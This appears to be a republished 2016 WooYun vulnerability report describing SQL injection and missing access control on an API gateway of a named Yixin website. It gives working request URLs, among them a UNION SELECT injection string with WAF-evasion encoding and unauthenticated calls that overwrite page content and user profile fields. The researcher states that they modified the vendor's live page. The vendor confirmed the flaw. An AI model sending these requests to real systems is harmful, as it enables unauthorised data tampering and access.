宜信某站api接口访问控制不当加SQL注入

2017年3月30日20:04:11评论379 views字数 209阅读0分41秒阅读模式

摘要

2016-03-24：细节已通知厂商并且等待厂商处理中
2016-03-24：厂商已经确认，细节仅向厂商公开
2016-04-03：细节向核心白帽子及相关领域专家公开
2016-04-13：细节向普通白帽子公开
2016-04-23：细节向实习白帽子公开
2016-05-08：细节向公众公开

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2016-188349

漏洞标题：宜信某站api接口访问控制不当加SQL注入

漏洞作者：学习委员

提交时间： 2016-03-24 09:22

公开时间： 2016-05-08 09:37

漏洞类型： SQL注射漏洞

危害等级：中

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：敏感接口缺乏校验

1人收藏

漏洞详情

披露状态：

简要描述：

人生真是寂寞如雪！

详细说明：

概述：还是这个站 WooYun: 宜信某站SQL注入绕过加速乐上次的乐趣主要在于绕过WAF。而这次没什么乐趣，只是觉得它还存在不少问题，这个程序感觉很奇葩。

这里有一个接口 http://brcms.yixin.com/s/gateway/index.php

它有两个重要的参数：

gateway_destination:"服务器要调用的目标类"

func_name:"服务器要调用的目标方法"

通过查看 html 文件和 JavaScript 文件的源代码你可以获取调用该接口所需的参数。

举个例子，http://brcms.yixin.com/s/gateway/index.php?gateway_destination=activity_honored_guest_talk/admin/GetList&func_name=GetList&activity_id=1

这个接口有两个问题，一是有些敏感功能对匿名用户开放，二是存在SQL注入。用以上例子证明注入，再次说明不能要依赖WAF。

除了这个接口，还有另一个注入点 http://brcms.yixin.com/inter-action-single.htm?id=115.0UNION SELECT 1,2,3,4,5,6,7,8,9,10,(user%09%23%0A%20())

怎么说该接口访问控制不当？如下例子，不好意思修改了你们的页面

code 区域

http://brcms.yixin.com/s/gateway/index.php
 ?gateway_destination=ii%2Finteractive_honored_guest%2Fadmin%2FUpdate
 &func_name=Update
 &interactive_id=10
 &id=7
 &name=学习委员
 &face=1437108379.jpg
 &title=wooyun：学习委员——人生真是寂寞如雪
 &guest_title=wooyun
 &description=我叫学习委员

还可以修改用户的个人信息等等，不一一列举了。

code 区域

http://brcms.yixin.com/s/gateway/index.php
 ?gateway_destination=user/updateUserInfo
 &func_name=updateUserInfo
 &nickname=张三
 &name=wooyun
 &
 &uid=27
 &birthday=19930911
 &job=boss
 &gender=1

漏洞证明：

已证明，如上

修复方案：

信不信问题还有！

版权声明：转载请注明来源学习委员@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-03-24 09:37

厂商回复：

感谢提醒，正在修复中。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-13 20:09 | Arrow ( 实习白帽子 | Rank:42 漏洞数:14 )

0

人生真是寂寞如雪

1# 回复此人

漏洞概要 关注数(6) 关注此漏洞

缺陷编号： WooYun-2016-188349

漏洞标题： 宜信某站api接口访问控制不当加SQL注入

相关厂商： 宜信

漏洞作者： 学习委员